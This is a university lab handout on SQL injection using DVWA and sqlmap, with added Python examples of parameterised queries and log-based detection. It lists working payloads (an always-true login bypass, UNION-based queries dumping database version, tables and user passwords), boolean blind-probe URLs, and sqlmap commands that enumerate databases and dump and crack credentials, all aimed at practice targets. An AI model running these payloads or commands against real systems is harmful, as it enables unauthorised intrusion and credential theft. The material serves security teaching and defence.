15/10/2024
Lecturer: Nguyễn Thị Thanh Vân – FIT - HCMUTE
SQL Injection attacks
o Example
Damn Vulnerable Web App – DVWA
o Examples
Sqlmap
o Examples
SQL Injections can do more harm than just bypassing the login logic. Some of the attacks include:
o Deleting data
o Updating data
o Inserting data
o Executing commands on the server that can download and install malicious programs such as Trojans
o Exporting valuable data such as credit card details, emails, and passwords to the attacker's remote server
o Getting user login details, etc.
Crack username/password
o SQL query:
SELECT * FROM Users WHERE Username='$username' AND Password='$password'
o Type:
$username = 1' or '1' = '1
$password = 1' or '1' = '1
o The query will be:
SELECT * FROM Users WHERE Username='1' OR '1' = '1' AND Password='1' OR '1' = '1'
=> the condition is always true (the OR '1' = '1' clause) => the system authenticates the user without knowing the username and password.
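As an added example (not from the slides), the login query above built by string concatenation next to the same query with bound parameters, run against an in-memory SQLite database through Python's sqlite3 module; DVWA itself is PHP/MySQL, and the Users table and its single row here are constructed for the demo.

```python
# Added example: the slide's login query, vulnerable form versus parameterised form.
import sqlite3

def make_db():
    """Constructed sample database: one Users table with one row."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE Users (Username TEXT, Password TEXT)")
    conn.execute("INSERT INTO Users VALUES ('alice', 's3cret')")  # constructed row
    return conn

def vulnerable_login(conn, username, password):
    # Mirrors the slide: the input is pasted straight into the SQL text, so a
    # quote character in the input changes the structure of the WHERE clause.
    sql = ("SELECT * FROM Users WHERE Username='" + username +
           "' AND Password='" + password + "'")
    return len(conn.execute(sql).fetchall()) > 0

def safe_login(conn, username, password):
    # The fix: placeholders keep the input as data. The driver never lets it
    # become part of the query structure, so the quote is just a character
    # to compare against and "1' or '1' = '1" matches no username.
    sql = "SELECT * FROM Users WHERE Username=? AND Password=?"
    return len(conn.execute(sql, (username, password)).fetchall()) > 0

INJECTED = "1' or '1' = '1"   # the payload from the slide

if __name__ == "__main__":
    conn = make_db()
    print(vulnerable_login(conn, INJECTED, INJECTED))  # True: login bypassed
    print(safe_login(conn, INJECTED, INJECTED))        # False: payload rejected
    print(safe_login(conn, "alice", "s3cret"))         # True: real credentials
```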
Using the operators AND and OR (boolean-based blind injection)
o SQL query:
SELECT * FROM products WHERE id_product=$id_product
Ex: http://www.example.com/product.php?id=10
o First send a false condition:
SELECT * FROM products WHERE id_product=10 AND 1=2
Ex: http://www.example.com/product.php?id=10 AND 1=2
=> there is no content available or a blank page.
o Then send a true condition and check whether a valid result comes back:
Ex: http://www.example.com/product.php?id=10 AND 1=1
Damn Vulnerable Web App (DVWA) is a PHP/MySQL web application that is damn vulnerable. Its main goal is to be an aid for security professionals to test
1.1 Download DVWA
1.2 Create database and user in DVWA
1.3 Config DVWA
1.4 Setup basic database in DVWA
1.5 Access DVWA
http://10.0.0.2/login.php
Set DVWA Security Level: Low, Medium, High
o SQL Injection
o SQL Injection (Blind)
Basic Injection: 1
Always True Scenario: %' or '0'='0
Display Database Version:
o %' or 0=0 union select null, version() #
Display Database User:
o %' or 0=0 union select null, user() #
Display Database Name:
o %' or 0=0 union select null, database() #
Display all tables in information_schema:
o %' and 1=0 union select null, table_name from information_schema.tables #
Display all the user tables in information_schema:
o %' and 1=0 union select null, table_name from information_schema.tables where table_name like 'user%'#
Display all the column fields of the users table from information_schema:
o %' and 1=0 union select null, concat(table_name,0x0a,column_name) from information_schema.columns where table_name = 'users' #
Display all the column field contents of the users table:
o %' and 1=0 union select null, concat(first_name,0x0a,last_name,0x0a,user,0x0a,password) from users #
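As an added example (not from the slides), detection logic for the two injection styles shown on this page: the boolean AND 1=2 / AND 1=1 probing from the blind-injection slide, and the UNION ... SELECT payloads listed above. It runs over constructed Common Log Format access-log lines (not real traffic); the hosts, paths and sizes are made up for the demo.

```python
# Added example: flag boolean probe pairs and UNION payloads in access logs.
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qs

# Constructed sample log (Common Log Format); not real traffic.
SAMPLE_LOG = """\
10.0.0.5 - - [15/Oct/2024:10:00:01 +0700] "GET /product.php?id=10 HTTP/1.1" 200 5120
10.0.0.5 - - [15/Oct/2024:10:00:03 +0700] "GET /product.php?id=10%20AND%201=2 HTTP/1.1" 200 312
10.0.0.5 - - [15/Oct/2024:10:00:05 +0700] "GET /product.php?id=10%20AND%201=1 HTTP/1.1" 200 5120
10.0.0.7 - - [15/Oct/2024:10:02:00 +0700] "GET /dvwa/vulnerabilities/sqli/?id=%25%27+or+0%3D0+union+select+null%2C+version%28%29+%23&Submit=Submit HTTP/1.1" 200 4410
10.0.0.9 - - [15/Oct/2024:10:03:00 +0700] "GET /product.php?id=11 HTTP/1.1" 200 4980
"""

# client, identd, user, [time], "METHOD URL PROTO", status, size
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) [^"]*" (\d{3}) (\d+|-)')
# A numeric id followed by a boolean condition, e.g. "10 AND 1=2" or "10 OR 1=1"
PROBE_RE = re.compile(r'^\s*\d+\s+(?:AND|OR)\s+(\d+)\s*=\s*(\d+)\s*$', re.IGNORECASE)
# Coarse signature for the UNION-based payloads on the slide
UNION_RE = re.compile(r'\bunion\b.*\bselect\b', re.IGNORECASE)

def parse_requests(log_text):
    """Yield (client_ip, path, parameter, decoded_value) for every query parameter."""
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        ip, url = m.group(1), m.group(2)
        parts = urlsplit(url)          # parse_qs URL-decodes the values for us
        for param, values in parse_qs(parts.query, keep_blank_values=True).items():
            for value in values:
                yield ip, parts.path, param, value

def find_union_payloads(log_text):
    """Sorted (ip, path, param) tuples whose value carries UNION ... SELECT."""
    return sorted({(ip, path, param) for ip, path, param, value in parse_requests(log_text)
                   if UNION_RE.search(value)})

def find_boolean_probes(log_text):
    """Sorted (ip, path, param) tuples where one client sent both a true and a
    false condition in the same parameter: the pattern of the blind test."""
    seen = defaultdict(set)
    for ip, path, param, value in parse_requests(log_text):
        p = PROBE_RE.match(value)
        if p:
            seen[(ip, path, param)].add(p.group(1) == p.group(2))  # True or False probe
    return sorted(key for key, kinds in seen.items() if kinds == {True, False})
```

The false probe in the sample log also returns a much smaller response (312 versus 5120 bytes), which is the "blank page" signal the slide describes and can be used as a second indicator.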
Get important information from the DVWA database (user/pass) at the different security levels:
o Low
o Medium
o High
sqlmap is an open source penetration testing tool that automates the process of
o detecting and exploiting SQL injection flaws
o taking over database servers.
It comes with a kick-ass detection engine, many niche features for the ultimate penetration tester, and a broad range of switches lasting from
o database fingerprinting,
o over data fetching from the database,
o to accessing the underlying file system and executing commands on the operating system via out-of-band connections.
Download and install sqlmap:
http://sqlmap.sourceforge.net/doc/README.html#s1
Open Firefox and add the Tamper Data add-on to the Tools menu
o Select Tools\Tamper Data
o Start Tamper Data
Or: press F12 to open the browser developer tools
Ex: shown in DVWA:
Run SQL injection
Prepare: tamper with the request
o Copy the Referer URL (Ref)
Ex: "http://192.168.1.106/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit"
o Copy the Cookie information (Coo)
Ex: "PHPSESSID=lpb5g4uss9kp70p8jccjeks621; security=low"
Run sqlmap to obtain the following pieces of information
o Obtain the database user for DVWA. Syntax:
./sqlmap.py -u <Ref> --cookie=<Coo> -b --current-db --current-user
o Ex: ./sqlmap.py -u "http://192.168.1.106/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="PHPSESSID=lpb5g4uss9kp70p8jccjeks621; security=low" -b --current-db --current-user
Do you want to keep testing? Y => Result
Run sqlmap
o Obtain database management usernames and passwords. Syntax:
./sqlmap.py -u <Ref> --cookie=<Coo> --string="Surname" --users --passwords
Use Dictionary Attack? Y
Dictionary Location? <Press Enter>
o Obtain db_hacker database privileges. Syntax:
./sqlmap.py -u <Ref> --cookie=<Coo> -U db_hacker --privileges
o Obtain a list of all databases:
./sqlmap.py -u <Ref> --cookie=<Coo> --dbs
o Obtain "dvwa" tables and contents:
./sqlmap.py -u <Ref> --cookie=<Coo> -D dvwa --tables
o Obtain columns for table dvwa.users:
./sqlmap.py -u <Ref> --cookie=<Coo> -D dvwa -T users --columns
Run sqlmap
o Obtain users and their passwords from table dvwa.users. Syntax:
./sqlmap.py -u <Ref> --cookie=<Coo> -D dvwa -T users -C user,password --dump
Do you want to use the LIKE operator? Y
Recognize possible HASH values? Y
What's the dictionary location? <Press Enter>
Use common password suffixes? Y
Use sqlmap to obtain the following pieces of information:
o A list of Database Management Usernames and Passwords.
o A list of databases
o A list of tables for a specified database
o A list of users and passwords for a specified database table.
1. DVWA: SQL Injection, SQL Injection Blind (2)
o Get important information in DVWA database such as: tables,
user/pass with different level: Low, Medium, High
2. Sqlmap: (2)
o Get important information in DVWA database: tables, user/pass
with different level: Low, Medium, High
o Database from other website, ex:
• http://testphp.vulnweb.com
3. Other Tools: (1)
o Hackbar (browser add-on) -> a vulnerable website.